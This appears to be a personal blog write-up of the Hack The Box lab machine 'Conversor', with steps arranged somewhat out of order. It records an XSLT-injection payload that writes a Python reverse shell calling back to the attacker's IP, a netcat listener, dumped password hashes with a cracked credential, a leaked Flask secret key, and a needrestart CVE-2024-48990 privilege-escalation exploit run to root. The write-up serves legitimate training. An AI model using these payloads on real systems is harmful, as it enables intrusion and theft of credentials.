chidunguyen.com

CONVERSOR-HTB Notes

CONVERSOR-HTB

Written by

Du

in

Here is my note on CONVERSOR box from Hackthebox.

CONVERSOR: 10.129.189.109

Running all scans on 10.129.189.109

Host is likely running Linux


---------------------Starting Port Scan-----------------------



PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http



---------------------Starting Script Scan-----------------------



PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 0174263947bc6ae2cb128b71849cf85a (ECDSA)
|_  256 3a1690dc74d8e3c45136e208062617ee (ED25519)

#FROM /var/www/conversor.htb/instance/users.db:

[SNIP]

fismathack:5b5c3ac3a1c897c94caad48e6c71fdec:Keepmesafeandwarm

[SNIP]

ssh fismathack@conversor.htb

[SNIP]

fismathack@conversor:~$ whoami
fismathack
fismathack@conversor:~$ hostname
conversor


conversor SHELL !

fismathack@conversor:~$ whoami
fismathack
fismathack@conversor:~$ hostname
conversor
fismathack@conversor:~$ ls
importlib  user.txt
fismathack@conversor:~$ cat user.txt
[REDIRECTED]

USER.TXT: [REDIRECTED]

PRIV ESC: 


www-data -> fismathack:


Needrestart sudo -l PRIV ESC NOTES:

fismathack@conversor:~$ sudo -l
Matching Defaults entries for fismathack on conversor:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User fismathack may run the following commands on conversor:
    (ALL : ALL) NOPASSWD: /usr/sbin/needrestart
	
fismathack@conversor:~$ needrestart --version

needrestart 3.7 - Restart daemons after library updates.

CVE-2024-48990 - Needrestart 3.7-3 Privilege Escalation Exploit

https://github.com/ten-ops/CVE-2024-48990_needrestart

https://github.com/Serner77/CVE-2024-48990-Automatic-Exploit  #WORKS ! 


┌──(root㉿kali)-[/home/kali/BOXES/CONVERSOR/CVE-2024-48990-Automatic-Exploit]
└─# python3 exploit.py --user fismathack --host 10.10.11.92 --att-ip 10.10.14.208 --ssh-pass Keepmesafeandwarm
[*] Compiling payload __init__.so ...
[*] HTTP server running at http://10.10.14.208:8000/__init__.so
[*] Connecting to fismathack@10.10.11.92 ...
[*] Uploading remote exploit script...
[*] Executing exploit remotely...
PWD python3 e.py >/dev/null 2>&1 &
> echo "[*] Bait PID: $(echo $!)"
> sleep 2
>
> echo "[*] Running needrestart..."
> sudo /usr/sbin/needrestart || true
>
> echo "[*] Checking if /tmp/poc was created..."
> if [ -f /tmp/poc ]; then
>   echo "[+] Exploit successful: executing root shell..."
>   /tmp/poc -p
> else
>   echo "[-] /tmp/poc not found. Exploit failed or target not vulnerable."
> fi
> EOF
fismathack@conversor:~$ chmod +x /tmp/exploit.sh
fismathack@conversor:~$ bash /tmp/exploit.sh
[*] Preparing malicious environment...
[*] Creating bait script e.py...
[*] Launching bait process with malicious PYTHONPATH...
[*] Bait PID: 7694
[*] Running needrestart...
Scanning processes...
Scanning candidates...
Scanning linux images...

Running kernel seems to be up-to-date.

Restarting services...
 systemctl restart cron.service

No containers need to be restarted.

No user sessions are running outdated binaries.

No VM guests are running outdated hypervisor (qemu) binaries on this host.
[*] Checking if /tmp/poc was created...
[+] Exploit successful: executing root shell...
poc-5.1# whoami
root

ROOT-SHELL ! 

poc-5.1# whoami
root
poc-5.1# hostname
conversor
poc-5.1# ls
root.txt  scripts
poc-5.1# cat root.txt
[REDIRECTED]

ROOT.TXT: [REDIRECTED]





	



80/tcp open  http    Apache httpd 2.4.52
|_http-title: Did not follow redirect to http://conversor.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)

http://conversor.htb/login

NO SQL LOGIN BYPASS. 

NO DEFAULT CREDS. 

Register an account as usual: qwop:qwop

Cookie: session=eyJ1c2VyX2lkIjo3LCJ1c2VybmFtZSI6InF3b3AifQ.aQZSbQ.FTpTGgqQG9uHvDVoBfU3ZrH5lE0

Decode this JWT: 

{
  "user_id": 7,
  "username": "qwop"
}

Encode it

{
  "user_id": 1,
  "username": "admin"
}

eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6ImFkbWluIn0.


All you need to do is upload your XML file along with the XSLT sheet to transform it into a more aesthetic format.

nmap scans into xml and xslt

nmap -sS -sV -O -p- 10.129.189.109 -oX scan-output.xml

sudo gobuster dir -u http://conversor.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 40 -x sh,txt,php,html,htm,asp,aspx,js,xml,log,json,jpg,jpeg,png,gif,doc,pdf,mpg,mp3,zip,tar.gz,tar


It's vulnerable to XSLT injection. 

XSLT Injection:

Download nmap.xslt from the main page. 

Scan nmap and turn it into nmap.xml as usual. 

We are going to use nmap.xslt exploit for nmap.xml 

nmap.xslt exploit :

[SNIP]

<xsl:for-each select="ports/port">
                <tr>
                  <td><xsl:value-of select="system-property('xsl:version')"/></td>
                  <td><xsl:value-of select="system-property('xsl:vendor')"/></td>
                  <td><xsl:value-of select="system-property('xsl:vendor-url')"/></td>
                  <td>
                    <xsl:attribute name="class">
                      <xsl:value-of select="system-property('xsl:product-name')"/>
                    </xsl:attribute>
                    <xsl:value-of select="system-property('xsl:product-version')"/>
                  </td>
                </tr>
              </xsl:for-each>
			  
[SNIP]

WORKS !!!

Port	Protocol	Service	State
1.0	libxslt	http://xmlsoft.org/XSLT/	
1.0	libxslt	http://xmlsoft.org/XSLT/

https://www.hackervice.com/server-side-vulnerabilities/server-side-attacks/xslt-injection/exploiting-xslt-injection

https://medium.com/@adipsharif/attacking-xslt-in-web-applications-ea538a8fb9d0

https://bughra.dev/posts/xslt/#xslt-processor-specific-attacks


XSLT 1.0

    Limited functionality
    No native file/system access
	

XSLT-Injection-Reverse-Shell:

https://github.com/ex-cal1bur/XSLT-Injection_reverse-shell/

┌──(root㉿kali)-[/home/kali/BOXES/CONVERSOR/XSLT-Injection_reverse-shell]
└─# cat caller.xml
<?xml version="1.0"?>
<revshell>test</revshell>

┌──(root㉿kali)-[/home/kali/BOXES/CONVERSOR/XSLT-Injection_reverse-shell]
└─# cat malicious.xslt
<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet
        xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:ptswarm="http://exslt.org/common"
    extension-element-prefixes="ptswarm"
    version="1.0">
<xsl:template match="/">
  <ptswarm:document href="/var/www/conversor.htb/scripts/test2.py" method="text">
import os

os.system(
    "python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.208\",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"])'"
)
  </ptswarm:document>
</xsl:template>
</xsl:stylesheet>

Upload those two files to gain a shell:

sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.208] from (UNKNOWN) [10.10.11.92] 49864
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ hostname
conversor
$ env
HOME=/var/www
LOGNAME=www-data
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
LANG=en_US.UTF-8
SHELL=/bin/sh
PWD=/var/www

USER-SHELL !

PRIV ESC:


www-data -> conversor:

python3 -c 'import pty; pty.spawn("/bin/bash")'

www-data@conversor:~/conversor.htb$ ls
ls
app.py  app.wsgi  instance  __pycache__  scripts  static  templates  uploads
www-data@conversor:~/conversor.htb$ cat app.wsgi
cat app.wsgi
import sys
sys.path.insert(0, "/var/www/conversor.htb")

from app import app as application
www-data@conversor:~/conversor.htb$ cat app.py
cat app.py
from flask import Flask, render_template, request, redirect, url_for, session, send_from_directory
import os, sqlite3, hashlib, uuid

app = Flask(__name__)
app.secret_key = 'C0nv3rs0rIsthek3y29'

BASE_DIR = os.path.dirname(os.path.abspath(__file__))
DB_PATH = '/var/www/conversor.htb/instance/users.db'
UPLOAD_FOLDER = os.path.join(BASE_DIR, 'uploads')
os.makedirs(UPLOAD_FOLDER, exist_ok=True)
[SNIP] 

www-data@conversor:~/conversor.htb$ cd instance
cd instance
www-data@conversor:~/conversor.htb/instance$ ls
ls
test  users.db
www-data@conversor:~/conversor.htb/instance$ ls -lah
ls -lah
total 36K
drwxr-x--- 2 www-data www-data 4.0K Nov  2 17:36 .
drwxr-x--- 8 www-data www-data 4.0K Aug 14 21:34 ..
-rw-r--r-- 1 www-data www-data   10 Nov  2 16:08 test
-rwxr-x--- 1 www-data www-data  24K Nov  2 17:36 users.db
www-data@conversor:~/conversor.htb/instance$ sqlite3 users.db
sqlite3 users.db
SQLite version 3.37.2 2022-01-06 13:25:41
Enter ".help" for usage hints.

www-data@conversor:~/conversor.htb/instance$ sqlite3 users.db
sqlite3 users.db
SQLite version 3.37.2 2022-01-06 13:25:41
Enter ".help" for usage hints.
sqlite> .tables
.tables
files  users
sqlite> select * from users
select * from users
   ...> ;
;
1|fismathack|5b5c3ac3a1c897c94caad48e6c71fdec
5|aaa|47bce5c74f589f4867dbd57e9ca9f808
6|testuser|e16b2ab8d12314bf4efbd6203906ea6c
7|abc|4ed9407630eb1000c0f6b63842defa7d
8|administrator|200ceb26807d6bf99fd6f4f0d1ca54d4
9|testtest|098f6bcd4621d373cade4e832627b4f6
10|Whytee|5737c6ec2e0716f3d8a7a5c4e0de0d9a
11|admin|21232f297a57a5a743894a0e4a801fc3
12|vaish|10487c8581423e8b2fbeed2b21c2cc53
13|admin12|21232f297a57a5a743894a0e4a801fc3
14|conca|6b30397d34e49c49e08a2f555b87956e
15|test|098f6bcd4621d373cade4e832627b4f6


fismathack:5b5c3ac3a1c897c94caad48e6c71fdec:Keepmesafeandwarm






Service Info: Host: conversor.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

More posts